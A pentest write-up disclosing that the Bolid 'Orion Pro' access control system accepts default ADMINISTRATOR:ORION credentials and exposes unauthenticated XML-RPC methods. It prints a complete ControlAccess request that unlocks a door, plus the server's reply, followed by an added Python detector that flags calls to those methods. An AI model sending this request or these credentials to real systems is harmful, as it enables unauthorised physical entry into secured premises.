Once, during a pentest, I discovered a host on the Wi-Fi network with a lot of open ports, among them an XML-RPC service.
The server kindly answered the garbage I had sent:
BolidXMLRPC/1.10 (Windows NT) ORION-BOLID v1.10
A bit of googling revealed that this is the access control system АРМ «Орион Про» from the security company ЗАО НВП «Болид».
After reading the documentation I tried the ADMINISTRATOR:ORION credentials it describes over XML-RPC. Success. You can manage the system and the database. But this story is not about that.
What if there was a strong password?
In such an unimaginable case you could use the XML-RPC methods that do not require authentication at all, for example GetPasswordListWithStatus, GetKeyFullInformation, GetDeviceListAsync, ControlAccess, etc.
If you want, you can open the door with this request:
GET / HTTP/1.1
Host: x.x.x.x:8080
Accept: image/webp,image/apng,image/*,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: ru,ru-RU;q=0.9,en;q=0.8,en-US;q=0.7
Connection: close
Content-Type: application/xml
Content-Length: 1467
<?xml version="1.0" encoding="windows-1251"?>
<methodCall>
<methodName>ControlAccess</methodName>
<params>
<param>
<value>
<struct>
<member>
<name>ComPort</name>
<value>
<int>3</int>
</value>
</member>
<member>
<name>PKUAddress</name>
<value>
<int>0</int>
</value>
</member>
<member>
<name>DeviceAddress</name>
<value>
<int>5</int>
</value>
</member>
<member>
<name>AggregateAddress</name>
<value>
<int>1</int>
</value>
</member>
<member>
<name>Command</name>
<value>
<int>7</int>
</value>
</member>
<member>
<name>MethodNameForAnswer</name>
<value>
<string>Result</string>
</value>
</member>
<member>
<name>IPSERVER</name>
<value>
<string>y.y.y.y</string>
</value>
</member>
<member>
<name>PORTSERVER</name>
<value>
<int>7777</int>
</value>
</member>
</struct>
</value>
</param>
</params>
</methodCall>
Voilà! The electronic lock is open!
HTTP/1.1 200 OK
Connection: Keep-Alive
Content-Length: 298
Content-Type: text/xml
Content-MD5: 5si9s8913Zio3EUFMy7mww==
Server: BolidXMLRPC/1.10 (Windows NT) ORION-BOLID v1.10
<?xml version="1.0" encoding="Windows-1251" ?>
<methodResponse>
<params>
<param>
<value>
<struct>
<member>
<name>Result</name>
<value><boolean>1</boolean></value>
</member>
</struct>
</value>
</param>
</params>
</methodResponse>
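Added example (not from the original writeup): a detection helper for the traffic shown above. It parses a captured HTTP request, extracts the XML-RPC methodName and struct members, and raises an alert when one of the methods the text lists as unauthenticated is called; the sample request is a constructed, shortened copy of the one above, and the alert fields and severity labels are my own choices, not anything from the Orion Pro documentation.

```python
import xml.etree.ElementTree as ET

# Methods the writeup says the Orion Pro XML-RPC service exposes without authentication.
SENSITIVE_METHODS = {"ControlAccess", "GetPasswordListWithStatus",
                     "GetKeyFullInformation", "GetDeviceListAsync"}

def split_http(raw):
    """Split a raw HTTP request into (request line, lower-cased header dict, body)."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    headers = {}
    for line in lines[1:]:
        key, _, value = line.partition(":")
        headers[key.strip().lower()] = value.strip()
    return lines[0], headers, body

def parse_method_call(body):
    """Return (methodName, {member: text}) from an XML-RPC methodCall whose
    first param is a struct; None if the body is not a well-formed methodCall."""
    try:
        root = ET.fromstring(body.strip())
    except ET.ParseError:
        return None
    if root.tag != "methodCall":
        return None
    members = {}
    for member in root.iterfind("./params/param/value/struct/member"):
        value = member.find("value/*")  # typed child: <int>, <string>, ...
        members[member.findtext("name")] = value.text if value is not None else None
    return root.findtext("methodName", ""), members

def analyze_request(raw, src_ip):
    """Emit an alert dict for an XML-RPC call to a sensitive method, else None."""
    _, headers, body = split_http(raw)
    if "xml" not in headers.get("content-type", ""):
        return None
    parsed = parse_method_call(body)
    if parsed is None or parsed[0] not in SENSITIVE_METHODS:
        return None
    method, members = parsed
    return {"src": src_ip, "method": method, "members": members,
            "severity": "high" if method == "ControlAccess" else "medium"}

SAMPLE = (  # constructed: a shortened copy of the request shown in the writeup
    "GET / HTTP/1.1\r\nHost: x.x.x.x:8080\r\nContent-Type: application/xml\r\n\r\n"
    '<?xml version="1.0" encoding="windows-1251"?><methodCall>'
    "<methodName>ControlAccess</methodName><params><param><value><struct>"
    "<member><name>DeviceAddress</name><value><int>5</int></value></member>"
    "<member><name>Command</name><value><int>7</int></value></member>"
    "<member><name>IPSERVER</name><value><string>y.y.y.y</string></value></member>"
    "</struct></value></param></params></methodCall>")
```

In practice the raw request would come from a proxy log or a packet capture in front of the XML-RPC port; any alert with method ControlAccess from a host that is not the operator workstation is worth an immediate look.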
The company believes that authentication is not required in access control software. Why do we need such security products?